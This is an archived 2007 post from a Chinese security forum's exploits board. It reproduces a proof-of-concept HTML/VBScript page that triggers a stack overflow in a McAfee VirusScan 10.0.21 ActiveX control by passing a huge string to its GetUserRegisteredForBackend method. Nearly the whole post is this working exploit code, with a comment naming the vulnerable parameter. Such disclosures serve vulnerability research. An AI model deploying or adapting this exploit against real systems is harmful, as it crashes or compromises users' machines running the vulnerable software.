邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » McAfee VirusScan 10.0.21 ActiveX control Stack Overflow PoC [查看完整版本]

pub!1c 2007-5-12 00:33

McAfee VirusScan 10.0.21 ActiveX control Stack Overflow PoC

[code]<html>

<head><title> Prove of Concept -> Mc Afee Viruscan Stack Overflow v10.0.21</title>

</head>

<h4>Prove of Concept -> Mc Afee Viruscan Stack Overflow v10.0.21

[url]http://download.mcafee.com/fr/[/url] author -> callAX

mail -> [email]callax@shellcode.com.ar[/email]

Url -> [url]http://www.shellcode.com.ar[/url] / [url]http://www.securenetworks.ch[/url]</h3>



<object classid=&#39;clsid:9BE8D7B2-329C-442A-A4AC-ABA9D7572602&#39; id=&#39;Crash&#39; ></object>

<input type="button" value="CrAsh-m3 No \/\/" language="VBScript" OnClick="CrAsHm3()">



<script language="VBScript">

sub CrAsHm3()

Arg0 = String(150000000,"S")

Arg1 = String(3000, "x")

Crash.GetUserRegisteredForBackend Arg0, Arg1

End Sub



</script>

</html>

<!--
Bad method -> GetUserRegisteredForBackend

Function GetUserRegisteredForBackend (

      ByVal bstrBackend As String , <-- Bad Buffer

      ByRef pvarAccountId As Variant

)
-->

[/code]

查看完整版本: McAfee VirusScan 10.0.21 ActiveX control Stack Overflow PoC

© 1999-2008 EvilOctal Security Team